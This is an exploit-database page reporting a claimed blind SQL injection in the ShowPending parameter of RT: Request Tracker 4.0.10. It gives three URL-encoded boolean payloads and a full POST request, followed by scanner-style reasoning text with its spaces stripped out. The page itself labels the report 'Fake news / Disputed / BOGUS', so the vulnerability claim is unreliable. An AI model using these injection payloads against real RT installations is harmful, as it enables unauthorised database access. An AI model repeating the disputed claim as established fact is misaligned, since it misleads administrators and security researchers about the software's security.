WARNING! Fake news / Disputed / BOGUS

RT: Request Tracker 4.0.10 SQL Injection

2013-04-11 / 2013-12-23
Credit: cheki
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: - SQL-Injection - RT: Request Tracker System # Date: 10/05/2013 # Exploit Author: cheki # Vendor Homepage: http://bestpractical.com/rt/ # Version: RT 4.0.10 # Tested on: Kali Linux ############################################ URL: http://10.10.10.70/Approvals/ Entity: ShowPending(Parameter) Risk: Itispossibletoview,modifyordeletedatabaseentriesandtables Causes: Sanitationofhazardouscharacterswasnotperformedcorrectlyonuserinput Fix: Reviewpossiblesolutionsforhazardouscharacterinjection #Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes and commenting out the rest of the query. #The following changes were applied the original request 1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+' 2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--' 3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--' POST /Approvals/ HTTP/1.0 Content-Type: application/x-www-form-urlencoded Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://10.10.10.70/Approvals/ Host: 10.10.10.70 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Length: 120 ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter= ############################################### Reasoning: Thetestresultseemstoindicateavulnerabilitybecauseitshowsthatvalues canbeappendedtoparametervalues, indicatingthattheywereembeddedinanSQLquery.HEX(0D)HEX(0A)In thistest,three(orsometimesfour)requestsare sent.Thelastislogicallyequaltotheoriginal,andthe nexttolastisdifferent.Anyothersareforcontrolpurposes.A comparisonofthelasttworesponseswith thefirst(thelastissimilartoit,andthenexttolastisdifferent)indicatesthat theapplicationisvulnerable. Home Page: securitylabnews.blogspot.com

References:

http://bestpractical.com/rt/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top